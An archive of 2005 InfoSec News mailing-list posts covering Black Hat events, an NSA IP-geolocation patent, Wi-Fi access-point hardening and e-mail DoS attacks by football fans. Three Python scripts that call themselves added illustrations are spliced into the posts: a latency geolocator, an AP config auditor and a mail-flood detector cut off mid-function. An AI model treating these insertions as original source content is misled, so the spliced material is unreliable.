On October 10-11, Black Hat will host four separate world-class trainings. The classes cover a variety of topics, including system administration, auditing and assessment, forensics, and infrastructure VoIP. Most of the class offerings are newly created or revised, ensuring that students are provided with up-to-date technical information.
Our trainers are recognized leaders in their fields, with real-world experience that drives their curriculum. As with all Black Hat Training events, students are eligible for CISSP/SCCP credits upon successful completion.

Courses offered are:

* Hacking by Numbers - Bootcamp Edition by SensePost
* Microsoft Ninjitsu by Tim Mullen
* Invisible Network; Invisible Risk by Adam Laurie
* Infrastructure Attacktecs & Defentecs: Cisco Voice Over IP (VoIP) by Stephen Dugan

For more information: http://www.blackhat.com/html/training-seattle-05/train-bh-sea-05-index.html

Our early bird registration rate is in effect until October 1. Register now and save: https://commerce.blackhat.com/seattle-reg

----------------

Tokyo, Keio Plaza Hotel * 17-18 October 2005 * japan.blackhat.com

Black Hat is honored to continue its partnership with Internet Association Japan to bring the second annual Black Hat Briefings Japan. The Black Hat Japan 2005 Briefings will take place at the Keio Plaza Hotel, October 17-18. The Black Hat Japan Briefings feature an international line up of internationally renowned security experts from around the globe.

Black Hat Briefings was originally founded in 1997 by Jeff Moss to fill the need of computer security professionals to better understand the security risks to their computers and information infrastructures by potential threats. To do this, the Black Hat Briefings assembles a group of vendor neutral security professionals and lets them speak candidly about the problems businesses face, and the solutions they see to those problems. No gimmicks, no sales pitches, just straight talk by people who make it their business to explore the ever-changing security space.
This year's conference will include talks by Dan Kaminsky on the Black Ops of TCP/IP, David Maynor and Robert Graham presenting on Architecture Flaws in Common Security Tools, the Grugq discussing VOIP security issues, Chris Hurley - Identifying and Responding to Wireless Attacks, Jeremiah Grossman presenting on Phishing with Super Bait, Saumil Shah and David Cole collaborating on an Adware/Spyware talk. Attendees will get the rare chance to meet with these and other experts up close and to ask specific questions about their findings, encouraging the quality exchange of information among the international attendees.

For more information on the speakers and speeches visit http://www.blackhat.com/html/bh-japan-05/bh-jp-05-en-speakers.html

Take advantage of our early registration rates by registering on-line now. http://www.blackhat.com/html/bh-registration/bh-registration.html#Japan

From isn at c4i.org Wed Sep 21 00:15:34 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 21 00:23:29 2005
Subject: [ISN] Bruce Schneier: Wrong on Katrina, Wrong on Terrorism
Message-ID:

Forwarded from: The Unknown Security Person

Hello InfoSec News,

At 02:09 AM 9/19/2005, you wrote:
> Forwarded from: Dan Verton
>
> http://www.itsecuritymagazine.com/its/Editors%20Desk/verton_opinion_schneier_091505.htm
>
> Bruce Schneier: Wrong About Katrina, Wrong About Terrorism

[Snip...]

Strange that a magazine purportedly for IT professionals is vulnerable to directory indexing. E.g., http://www.itsecuritymagazine.com/its/

From isn at c4i.org Thu Sep 22 01:31:35 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 22 01:44:01 2005
Subject: [ISN] Institute for IT security to launch in January
Message-ID:

http://www.vnunet.com/computing/news/2142615/computer-security-industry

Daniel Thomas
Computing
21 Sept 2005

An institute for IT security experts will be set up in January next year to improve professionalism throughout the computer security industry.
The organisation, backed by the Department of Trade and Industry, the Cabinet Office and major UK firms such as BP, BT and The Royal Bank of Scotland, aims to promote professional standards and provide mentoring and work experience.

The plan was first announced in January this year, and Computing has learned that it will start up in early 2006.

The Institute for Information Security Professionals (IISP) will certify security experts in a similar way to many other professions, such as the British Medical Association for doctors. IT security professionals who qualify for membership will have to adhere to a code of conduct and attend workshops.

"Knowing that someone has the experience, qualifications and adheres to a set of ethics is very important. It will improve confidence in the security industry and help when it comes to choosing people for jobs," said Nick Coleman, chairman of IT security suppliers group Saint, which is involved in the project.

The organisation has already conducted market research to identify an acceptable membership fee, and is in discussion with existing institutes which may be appointed to run the scheme independently.

"Doctors leave university with some of the best sets of degrees out there, but they don't immediately get a scalpel and start operating," said Paul Dorey, IISP founder and chief information security officer at BP. "They have mentoring and coaching before they are allowed to operate, and similar standards should exist in security."

Development of the IISP is being led by Fred Piper, professor of security at University of London's Royal Holloway College, but leadership is expected to be handed over to an elected leader when it has an independent infrastructure next year.
From isn at c4i.org Thu Sep 22 01:31:53 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 22 01:44:26 2005
Subject: [ISN] NSA granted Net location-tracking patent
Message-ID:

http://news.com.com/NSA+granted+Net+location-tracking+patent/2100-7348_3-5875953.html

By Declan McCullagh
Staff Writer, CNET News.com
September 21, 2005

The National Security Agency has obtained a patent on a method of figuring out an Internet user's geographic location.

Patent 6,947,978, granted Tuesday, describes a way to discover someone's physical location by comparing it to a "map" of Internet addresses with known locations.

The NSA did not respond Wednesday to an interview request, and the patent description talks only generally about the technology's potential uses. It says the geographic location of Internet users could be used to "measure the effectiveness of advertising across geographic regions" or flag a password that "could be noted or disabled if not used from or near the appropriate location."

Other applications of the geo-location patent, invented by Stephen Huffman and Michael Reifer of Maryland, could relate to the NSA's signals intelligence mission--which is, bluntly put, spying on the communications of non-U.S. citizens.

"If someone's engaged in a dialogue or frequenting a 'bad' Web site, the NSA might want to know where they are," said Mike Liebhold, a senior researcher at the Institute for the Future who has studied geo-location technology. "It wouldn't give them precision, but it would give them a clue that they could use to narrow down the location with other intelligence methods."

The NSA's patent relies on measuring the latency, meaning the time lag between computers exchanging data, of "numerous" locations on the Internet and building a "network latency topology map." Then, at least in theory, the Internet address to be identified can be looked up on the map by measuring how long it takes known computers to connect to the unknown one.
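The latency map the patent describes, in a simplified form, as an added illustration that is not part of the CNET article or of the patent text: a handful of landmark hosts at known coordinates measure round-trip time to the unknown address, each RTT is turned into a distance using an assumed propagation speed of about 200 km per ms plus a fixed per-path overhead (those two figures are my assumptions, not the patent's model), and a grid search finds the point whose distances to all landmarks best fit. The landmark coordinates, the target placed in Denver and every RTT value are constructed for the demo; real measurements are noisier and real routes more circuitous, so a production version needs a latency-to-distance model fitted from measurements. The login check at the end is the use the patent itself names, flagging a password used far from where the account is normally used.

```python
"""Latency-based geolocation in the spirit of the NSA patent (illustration only,
not the patent's algorithm): landmarks at known coordinates measure RTT to an
unknown host, each RTT becomes an estimated distance, and the point that best
fits all distances is the location estimate."""
import math

EARTH_RADIUS_KM = 6371.0
# Assumed propagation model (a simplification): roughly two thirds of c in
# fibre, ~200 km per ms, plus a constant few ms of queueing/per-hop overhead.
FIBER_KM_PER_MS = 200.0
BASE_RTT_MS = 4.0

# Constructed landmark set (approximate city-centre coordinates, degrees).
LANDMARKS = {
    "New York": (40.71, -74.01),
    "Chicago": (41.88, -87.63),
    "Dallas": (32.78, -96.80),
    "Los Angeles": (34.05, -118.24),
    "Seattle": (47.61, -122.33),
    "Kansas City": (39.10, -94.58),
    "Salt Lake City": (40.76, -111.89),
    "Atlanta": (33.75, -84.39),
}
TRUE_LOCATION = (39.74, -104.99)  # Denver: where the constructed target really is


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points given in degrees."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def synthetic_rtts(lat, lon):
    """Stand-in for real pings: the RTT each landmark would see to a host at
    (lat, lon) under the model above.  Constructed data for the demo."""
    return {name: BASE_RTT_MS + 2 * haversine_km(lat, lon, *pos) / FIBER_KM_PER_MS
            for name, pos in LANDMARKS.items()}


def _grid_search(score, lat0, lat1, lon0, lon1, step):
    """Return (score, lat, lon) of the lowest-scoring grid point."""
    best = None
    lat = lat0
    while lat <= lat1:
        lon = lon0
        while lon <= lon1:
            s = score(lat, lon)
            if best is None or s < best[0]:
                best = (s, lat, lon)
            lon += step
        lat += step
    return best


def locate(rtts, max_rms_km=250.0):
    """Return (lat, lon, rms_km) for the point whose landmark distances best
    match the RTT-derived distances, or None when no point fits within
    max_rms_km, i.e. the measurements do not describe a single location."""
    est_km = {n: max(0.0, (rtt - BASE_RTT_MS) * FIBER_KM_PER_MS / 2) for n, rtt in rtts.items()}

    def rms(lat, lon):
        err2 = [(haversine_km(lat, lon, *LANDMARKS[n]) - d) ** 2 for n, d in est_km.items()]
        return math.sqrt(sum(err2) / len(err2))

    lats = [LANDMARKS[n][0] for n in est_km]
    lons = [LANDMARKS[n][1] for n in est_km]
    # Coarse 1-degree pass over the landmark bounding box, then a 0.05-degree
    # refinement around the coarse winner.
    _, clat, clon = _grid_search(rms, math.floor(min(lats)) - 2, math.ceil(max(lats)) + 2,
                                 math.floor(min(lons)) - 2, math.ceil(max(lons)) + 2, 1.0)
    fine = _grid_search(rms, clat - 1.5, clat + 1.5, clon - 1.5, clon + 1.5, 0.05)
    if fine[0] > max_rms_km:
        return None
    return fine[1], fine[2], fine[0]


def login_location_check(rtts, expected, radius_km=500.0):
    """'ok' if the estimate lies within radius_km of where the account is
    normally used, 'review' if it is clearly elsewhere, 'unknown' if the
    latencies do not resolve to any single location."""
    est = locate(rtts)
    if est is None:
        return "unknown"
    return "ok" if haversine_km(est[0], est[1], *expected) <= radius_km else "review"


# Constructed RTTs that no single point explains: New York and Los Angeles both
# report the host a few hundred km away although they are ~3900 km apart.
INCONSISTENT_RTTS = {
    "New York": 6.0, "Chicago": 35.0, "Dallas": 38.0, "Los Angeles": 7.0,
    "Seattle": 45.0, "Kansas City": 30.0, "Salt Lake City": 33.0, "Atlanta": 28.0,
}

if __name__ == "__main__":
    rtts = synthetic_rtts(*TRUE_LOCATION)
    print("estimate (lat, lon, rms km):", locate(rtts))
    print("account usually in Denver:", login_location_check(rtts, TRUE_LOCATION))
    print("account usually in New York:", login_location_check(rtts, LANDMARKS["New York"]))
    print("inconsistent measurements:", login_location_check(INCONSISTENT_RTTS, TRUE_LOCATION))
```

The estimator declines to answer when no single point explains the measurements (for instance RTTs taken along very different routes), returning "unknown" rather than a confident wrong location, which is the behaviour a login-anomaly pipeline should prefer. A host reached through a proxy service still resolves to the proxy's location, the limitation the article notes, and no latency fit can remove it.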
The technique isn't foolproof. People using a dial-up connection can't be traced beyond their Internet service provider--which could be in a different area of the country--and it doesn't account for proxy services like Anonymizer.

Geo-location, sometimes called "geo-targeting" when used to deliver advertising, is an increasingly attractive area for Internet businesses. DoubleClick has licensed geo-location technology to deliver location-dependent advertising, and Visa has signed a deal to use the concept to identify possible credit card fraud in online orders. Digital Envoy holds a patent on geo-location, and Quova, a privately held firm in Mountain View, Calif., holds three more, one shared with Microsoft.

"It's honestly not clear that there's anything special or technically advanced about what they're describing," Quova Vice President Gary Jackson said, referring to the NSA's patent. "I'd have to have our technical guys read it, but I don't think it impacts us in any way."

From isn at c4i.org Thu Sep 22 01:32:50 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 22 01:45:02 2005
Subject: [ISN] Security UPDATE -- Tweaking Wi-Fi APs for Better Security -- September 21, 2005
Message-ID:

====================

This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE.

Download Free: Patch & Spyware Management in one easy-to-use GUI
http://list.windowsitpro.com/t?ctl=14281:4FB69

The Impact of Disk Defragmentation
http://list.windowsitpro.com/t?ctl=1426C:4FB69

====================

1. In Focus: Tweaking Wi-Fi APs for Better Security

2. Security News and Features
   - Recent Security Vulnerabilities
   - Update Rollup 1 for Windows 2000 SP4 Re-released
   - Critical Bug in Firefox, Mozilla, and Netscape Browser
   - Take a Closer Look at EFS

3. Instant Poll

4.
Security Toolkit
   - Security Matters Blog
   - FAQ

5. New and Improved
   - Management and Security Appliance

====================

==== Sponsor: Shavlik ====

Download Free: Patch & Spyware Management in one easy-to-use GUI.

Is your network really secure? The first step to securing your network is to remove spyware, adware, and malware. Next, patch your systems to stop re-infestation. Introducing Shavlik NetChk Protect-- Patch & Spyware Management in one easy-to-use GUI. Shavlik NetChk Protect is an automated solution designed for the enterprise that boasts accurate detection/remediation and prevents spyware installation, maximizing network security against such threats. Remediate spyware and install patches with Shavlik NetChk Protect for a complete security solution. To download free software visit:
http://list.windowsitpro.com/t?ctl=14281:4FB69

====================

==== 1. In Focus: Tweaking Wi-Fi APs for Better Security ====
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

Security has become even more important due to the spread of wireless networking. As a result, we've seen several new wireless security companies spring to life and subsequently grow by leaps and bounds. These companies make specialized solutions that consist of proprietary hardware and software that guard wireless networks against a wide range of potential intrusions.

Even if you have one or more of these specialized tools in place, you can improve your wireless security, particularly by adjusting the operation of your Access Points (APs). For example, you can manage AP transmission output power and shape the pattern and direction of signal transmission.

Although I don't know of any APs that ship from the manufacturer with built-in configuration settings that let you adjust transmission power levels, they might exist. If so, you could turn down the transmission power output level to reduce the distance that the signals will propagate.
This helps limit the vicinity in which potential intruders can operate.

If your AP doesn't include such a feature, you could possibly install third-party firmware for your AP that does provide such support. Several third-party firmware solutions are available for hardware based on Broadcom chipsets, such as Cisco Systems, Linksys, Buffalo Technology, ASUS, Motorola, Siemens, U.S. Robotics, and NETGEAR APs.

Last week I downloaded a third-party firmware package, installed it to an AP, and configured it according to my needs in under 30 minutes. Like most AP firmware, the third-party solution has an intuitive interface, so I didn't need to read any detailed documentation to make it work right.

As a result of installing the third-party firmware, I was able to configure that AP to reduce transmission output from 20 milliwatts (mW) to about 3 mW, which is all that I need for that particular office space. As a result, any would-be intruders would have to be physically in the office before they could get a usable connection to that wireless network. The end result is stronger security for only a few dollars.

Using third-party firmware offers other benefits. For example, the firmware I installed supports a custom desktop client that interacts with the AP. Using that client, I can see all the AP's connections; view all broadcasting clients on the wireless network, including those not connected to that AP; measure bandwidth usage; and more.

Other benefits include the ability to run a Secure Shell (SSH) server directly on the AP for remote access and administration. Doing so means that I don't have to expose a Web interface.
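The tuning described in this column (turning transmit power down, administering the AP over SSH rather than an exposed Web interface, and requiring WPA2 rather than WPA) can be checked mechanically against a configuration dump. The Python script below is an added example, not code from the column or from any firmware project: it audits a constructed key=value configuration against a small policy, shows a weak configuration beside the hardened one, and estimates how much usable range a power cut removes. The key names (tx_power_mw, web_admin_wan, ssh_admin, wpa_mode, cipher, remote_syslog), the 5 mW policy ceiling and the free-space range model are assumptions for illustration; real firmware uses its own settings.

```python
"""Audit an access-point configuration for the hardening points discussed
in the column.  Added example, not code from the column or from any
firmware project: the key=value format, the key names and the policy
ceiling are assumptions for illustration."""
import math

# Assumed policy: a small office does not need more than 5 mW (the column
# settled on about 3 mW for its space).
MAX_TX_POWER_MW = 5.0

# Constructed sample: an AP with typical out-of-the-box settings.
WEAK_CONFIG = """\
ssid=office-ap
tx_power_mw=20
web_admin_wan=1
ssh_admin=0
wpa_mode=wpa1+wpa2
cipher=tkip+ccmp
remote_syslog=
"""

# Constructed sample: the same AP after tuning it as the column describes.
HARDENED_CONFIG = """\
ssid=office-ap
tx_power_mw=3
web_admin_wan=0
ssh_admin=1
wpa_mode=wpa2
cipher=ccmp
remote_syslog=10.0.0.5
"""


def parse_config(text):
    """Parse a key=value configuration dump into a dict; blank lines and
    '#' comments are ignored."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        cfg[key.strip()] = value.strip()
    return cfg


def audit(cfg):
    """Return a list of findings; an empty list means the AP meets policy."""
    findings = []
    try:
        power = float(cfg.get("tx_power_mw", ""))
    except ValueError:
        power = None
    if power is None:
        findings.append("tx_power_mw is missing or not numeric")
    elif power > MAX_TX_POWER_MW:
        findings.append(f"transmit power {power:g} mW exceeds the {MAX_TX_POWER_MW:g} mW ceiling")
    if cfg.get("web_admin_wan") == "1":
        findings.append("Web administration interface is exposed on the WAN side")
    if cfg.get("ssh_admin") != "1":
        findings.append("SSH administration is disabled; enable it so the Web interface can be turned off")
    if cfg.get("wpa_mode") != "wpa2":
        findings.append(f"wpa_mode={cfg.get('wpa_mode', '')!r} still accepts WPA1 clients; require wpa2")
    if cfg.get("cipher") != "ccmp":
        findings.append(f"cipher={cfg.get('cipher', '')!r} allows TKIP; require ccmp")
    if not cfg.get("remote_syslog"):
        findings.append("no remote syslog server; AP logs are lost on reset or compromise")
    return findings


def relative_range(new_mw, old_mw):
    """Fraction of the original usable range left after a power change,
    assuming free-space propagation (range scales with the square root of
    transmit power).  Walls and antenna gain change the real figure."""
    if new_mw <= 0 or old_mw <= 0:
        raise ValueError("power must be positive")
    return math.sqrt(new_mw / old_mw)


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{label}: {audit(parse_config(text)) or ['no findings']}")
    print(f"20 mW -> 3 mW keeps about {relative_range(3, 20):.0%} of the range")
```

The range estimate is deliberately crude: the square-root rule holds for free-space loss only, so the column's "physically in the office" result depends on the building as much as on the 20 mW to 3 mW cut, which is why the audit treats the power ceiling as one finding among several rather than as the whole control.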
I could also establish a PPTP VPN server, Quality of Service (QoS) and bandwidth management parameters, and virtual LANs; quickly block peer-to-peer (P2P) clients; configure IPv6; use a remote syslog server; force the use of Wi-Fi Protected Access (WPA) and WPA2 authentication; and even configure a way for guests to easily use the wireless network to surf the Internet when visiting the office. Third-party firmware also offers many other features that I don't have room to discuss here.

The bottom line is that third-party firmware is easy to install and use, doesn't require any specialized skills or knowledge for everyday use, is incredibly cheap to obtain and administer, and strengthens your overall wireless security.

If you do have advanced skills, you can easily add on to third-party firmware solutions to extend the capabilities even further. For example, you could add a mini-Web server, a controlled access public hotspot interface, Voice over IP (VoIP) capabilities, Remote Authentication Dial-In User Service (RADIUS) authentication, and more.

If you're interested in more information about third-party AP firmware, please send me a quick email message (even an anonymous message is all right) to express your interest. Use "AP Firmware" as the subject of your email so that I can quickly locate your message in my inbox. If there's enough interest, I could write about how to decide which firmware might be best for your needs, where to find it, how to quickly and easily get it working for better security in your environment, and how to extend its functionality even further.

====================

==== Sponsor: Diskeeper ====

The Impact of Disk Defragmentation

Nearly every IT professional has a fragmentation horror story--in which fragmentation severely degraded performance such that systems were unusable.
In this free white paper, learn what impact fragmentation has on users and system activities and discover how quickly fragmentation accumulates as a result of these activities. Plus get the recommendations you need to manage the frequency of defragmentation across your infrastructure.
http://list.windowsitpro.com/t?ctl=1426C:4FB69

====================

==== 2. Security News and Features ====

Recent Security Vulnerabilities

If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at
http://list.windowsitpro.com/t?ctl=14274:4FB69

Update Rollup 1 for Windows 2000 SP4 Re-released

Microsoft didn't release any security bulletins this month as part of its regular release schedule. Microsoft had previously indicated that it would release one security bulletin, but the company discovered problems in the patch and decided not to release it until it meets quality control standards. However, the company did re-release Update Rollup 1 for Windows 2000 Service Pack 4 (SP4) to address numerous problems.
http://list.windowsitpro.com/t?ctl=14279:4FB69

Critical Bug in Firefox, Mozilla, and Netscape Browsers

Last week, Tom Ferris reported a buffer overflow vulnerability in Mozilla Firefox Web browsers. The vulnerability exists due to faulty processing of URLs and could lead to the execution of remote code. Netscape and other Mozilla browsers are also affected by the problem because they share the same code base as Firefox.
http://list.windowsitpro.com/t?ctl=1427D:4FB69

Take a Closer Look at EFS

Contrary to popular opinion, Microsoft's Encrypting File System (EFS) is a reliable, easy-to-use, and secure encryption solution, and it can trump even the network administrator's rights. EFS is great for protecting confidential files on the network and on often-stolen laptop computers.
In this article, Roger Grimes discusses the basics of EFS, talks about its purpose and functionality, and discusses basic administrative tasks and pitfalls.
http://list.windowsitpro.com/t?ctl=1427C:4FB69

====================

==== Resources and Events ====

Cut Your Windows XP Migration Time by 60% or More!

If your organization is considering--or has already begun--migrating your operating system to Windows XP, then this Web seminar is for you. Sign up for this free event and you'll learn how to efficiently migrate your applications into the Windows Installer (MSI) format, to prepare them for error-free deployment, what steps you need to follow to package your applications quickly and correctly, and more!
http://list.windowsitpro.com/t?ctl=14273:4FB69

Discover SQL Server 2005 for the Enterprise. Are you prepared?

In this free half-day event, you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today!
http://list.windowsitpro.com/t?ctl=14272:4FB69

Get Ready for the SQL Server 2005 Roadshow in Europe

Back By Popular Demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a one-year membership to PASS and a one-year subscription to SQL Server Magazine. Register now.
http://list.windowsitpro.com/t?ctl=1426F:4FB69

Are You Walking the Tightrope Between Recovery and Continuity?

There's a big difference between the ability to quickly recover lost or damaged data and the ability to keep your messaging operations running normally before, during, and after an outage.
In this free Web seminar, you'll learn what the technical differences are between recovery and continuity, when each is important, and what you can do to make sure that you're hitting the right balance between them.
http://list.windowsitpro.com/t?ctl=1426E:4FB69

High Risk Internet Access: Are You in Control?

Defending against Internet criminals, spyware and phishing and addressing the points of risk that Internet-enabled applications expose your organization to can seem like an epic battle with Medusa. So how do you take control of these valuable resources? This free Web seminar will give you the tools you need to help you analyze the impact Internet-based threats have on your organization and tools to aid you in the construction of acceptable use policies (AUPs).
http://list.windowsitpro.com/t?ctl=14270:4FB69

====================

==== 3. Instant Poll ====

Results of Previous Poll:
Does your company use an encryption product to protect files and folders on Windows systems? The voting has closed in this Windows IT Pro Security Hot Topic nonscientific Instant Poll. Here are the results from the 12 votes.
- 17% Yes, we use Microsoft Windows Encrypting File System (EFS).
- 33% Yes, we use a third-party product.
- 0% We haven't used encryption in the past, but we're considering it now.
- 50% No, we don't see any need to encrypt data.

New Instant Poll:
Have you, your company, or someone you know been a victim of online fraud? Go to the Security Hot Topic and submit your vote for
- Yes
- No
- Not sure
http://list.windowsitpro.com/t?ctl=1427E:4FB69

====================

==== Featured White Paper ====

Software Packaging Workflow Best Practices

Managing desktop software configurations doesn't have to be a manual process, resulting in unplanned costs, deployment delays, and client confusion. In this free white paper, you'll learn how to manage the software package preparation process and increase your desktop reliability, user satisfaction, and IT cost effectiveness.
Download your copy now and discover the value of standardizing the software packaging process.
http://list.windowsitpro.com/t?ctl=1426D:4FB69

====================

==== Hot Release ====

Consolidate Your SQL Server Infrastructure

Shared data clustering is the breakthrough consolidation solution for Microsoft Windows servers. Find out how you can reduce the overall Total Cost of Ownership (TCO) for SQL Server cluster deployments by as much as 60 percent over three years! Download your free copy now.
http://list.windowsitpro.com/t?ctl=1426B:4FB69

====================

==== 4. Security Toolkit ====

Security Matters Blog: Your Inbox Is Open to the World
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=14280:4FB69

Heard of Mailinator? Get a mailbox at this throw-away service and anybody can read your inbox. But that's OK. A Mailinator mailbox address is just to give out to someone from whom you want to receive one message--someone you suspect might follow up with spam. You get the desired message, then Mailinator deletes your temporary account.
http://list.windowsitpro.com/t?ctl=1427A:4FB69

FAQ
by John Savill, http://list.windowsitpro.com/t?ctl=1427F:4FB69

Q: How can I use a script to generate a list of all IP addresses on a machine?

Find the answer at
http://list.windowsitpro.com/t?ctl=1427B:4FB69

====================

==== Announcements ====
(from Windows IT Pro and its partners)

Get All the Exchange Tips You Need

If you haven't subscribed to Exchange & Outlook Administrator, you're missing out on key information that will go a long way toward preventing serious messaging problems and downtime. Order now and discover tools and solutions you won't find anywhere else to help you migrate, optimize, administer, back up, recover, and secure Exchange and Outlook. Subscribe today:
http://list.windowsitpro.com/t?ctl=14276:4FB69

Windows IT Pro Has What IT Professionals Need

Get Windows IT Pro and get answers.
Subscribe today and get an entire year for just $39.95--that's 44% off the cover price! You'll also gain exclusive access to the entire Windows IT Pro article database (over 9000 articles) and get the Top Windows Tips handbook (over 50 helpful tips) FREE. This is a limited-time, risk-free offer, so click here now:
http://list.windowsitpro.com/t?ctl=14277:4FB69

====================

==== 5. New and Improved ====
by Renee Munshi, products@windowsitpro.com

Management and Security Appliance

KACE announced KBOX IT Management Suite 2.0, a server appliance for midsized businesses that manages and monitors inventory, distribution, patching, security, compliance, messaging, licensing, and performance for the systems on their networks. When you add the KBOX Security Enforcement and Audit Module, the KBOX appliance scans for and reports on known security vulnerabilities based on the Open Vulnerability and Assessment Language (OVAL) standard, which covers almost 1000 vulnerabilities and is sponsored by the United States Computer Emergency Readiness Team (US-CERT) and the Department of Homeland Security. KBOX also lets you deploy security policies with support for automatic remediation, repair, and if necessary, network node isolation (quarantine). For more information, go to
http://list.windowsitpro.com/t?ctl=14283:4FB69

Tell Us About a Hot Product and Get a T-Shirt!

Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com.

Editor's note: Share Your Security Discoveries and Get $100

Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column.
Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length.

====================

==== Sponsored Links ====

Argent Versus MOM 2005
Download Argent Versus Microsoft Operations Manager 2005
http://list.windowsitpro.com/t?ctl=1426A:4FB69

Is Your Office Truly Fax Integrated?
Download this free whitepaper from Faxback and find out!
http://list.windowsitpro.com/t?ctl=14271:4FB69

====================

==== Contact Us ====

About the newsletter -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=14282:4FB69
About product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com

====================

This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today.
http://list.windowsitpro.com/t?ctl=14278:4FB69

View the Windows IT Pro privacy policy at
http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2005, Penton Media, Inc. All rights reserved.
From isn at c4i.org Thu Sep 22 01:33:05 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 22 01:45:53 2005
Subject: [ISN] Irate football fans launched DoS attacks
Message-ID:

http://news.zdnet.co.uk/internet/0,39020369,39219634,00.htm

Tom Espiner
ZDNet UK
September 21, 2005

Manchester United fans enraged at Malcolm Glazer's takeover bid unleashed cyberattacks against the American millionaire's legal advisors earlier this year

Legal firm Allen & Overy fought off a number of DoS attacks earlier this year when it was negotiating Malcolm Glazer's takeover bid of Manchester United, a company representative has revealed.

Infuriated fans of the club attempted to overload the firm's servers "by sending a large quantity of large emails," over the months that Allen & Overy were representing Glazer, according to Mark Andrews, infrastructure developer with the firm.

"Their intention was to stop us from representing Glazer," Andrews told ZDNet UK at a roundtable security session in London on Wednesday.

The fans "mounted a fairly crude attack" in response to the American millionaire's ultimately successful takeover bid earlier this year, targeting visible representatives of the company, such as the lead partner in the firm and the head of the external PR company, Andrews said.

The attack did not crash the firm's servers but instead slowed down emails being sent and received at the firm because of the volume of massive emails being queued at the portal, according to Andrews. "It was an annoyance," he said.

It was fairly easy to remedy the situation as the attack was "so unsophisticated", according to Andrews. The firm "simply put in blocks at the perimeter through the service provider" in order to filter the spam, Andrews said.

"Interestingly, if you try to send us emails even now with words like 'Man United' or 'Glazer' in, they'll bounce back," he added.
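The flood Andrews describes, a burst of very large messages aimed at a few visible mailboxes, is a volumetric signal that a mail gateway's own log can surface before the queue backs up. The Python script below is an added example and not anything Allen & Overy or its provider used: it runs a sliding-window check over constructed gateway log lines and raises one alert per sending domain once the large-message count or the total bytes in a ten-minute window cross an assumed threshold, which is the point at which an administrator would ask the perimeter provider for the kind of block the article mentions. The log format, the domain names under the reserved .test suffix, and the thresholds are all constructed for the example.

```python
"""Volumetric detection of a large-e-mail flood in mail-gateway logs.
Added example, not the firm's or its provider's tooling: the log format,
the sample entries and the thresholds are all constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed gateway log: one accepted message per line.
SAMPLE_LOG = """\
2005-05-12T09:00:05 from=<alice@client.test> rcpt=<partner@lawfirm.test> size=24576 status=accepted
2005-05-12T09:01:10 from=<a1@fanclub.test> rcpt=<lead.partner@lawfirm.test> size=8388608 status=accepted
2005-05-12T09:01:40 from=<a2@fanclub.test> rcpt=<lead.partner@lawfirm.test> size=8388608 status=accepted
2005-05-12T09:02:15 from=<bob@client.test> rcpt=<partner@lawfirm.test> size=6291456 status=accepted
2005-05-12T09:02:30 from=<a3@fanclub.test> rcpt=<press@lawfirm.test> size=8388608 status=accepted
2005-05-12T09:03:05 from=<a1@fanclub.test> rcpt=<lead.partner@lawfirm.test> size=8388608 status=accepted
2005-05-12T09:03:50 from=<a4@fanclub.test> rcpt=<press@lawfirm.test> size=8388608 status=accepted
2005-05-12T09:04:20 from=<a2@fanclub.test> rcpt=<lead.partner@lawfirm.test> size=8388608 status=accepted
2005-05-12T09:30:00 from=<alice@client.test> rcpt=<partner@lawfirm.test> size=4096 status=accepted
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) from=<[^@>]*@(?P<domain>[^>]+)> rcpt=<(?P<rcpt>[^>]+)> size=(?P<size>\d+)"
)

WINDOW = timedelta(minutes=10)          # sliding window per sending domain
LARGE_MSG_BYTES = 5 * 1024 * 1024       # what counts as a "large" message
FLOOD_BYTES = 40 * 1024 * 1024          # total bytes per domain per window
FLOOD_COUNT = 5                         # large messages per domain per window


def parse_log(text):
    """Yield (timestamp, sender_domain, recipient, size) for each parsable line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable lines are skipped, not fatal
        yield (datetime.fromisoformat(m["ts"]), m["domain"].lower(),
               m["rcpt"].lower(), int(m["size"]))


def detect_floods(records):
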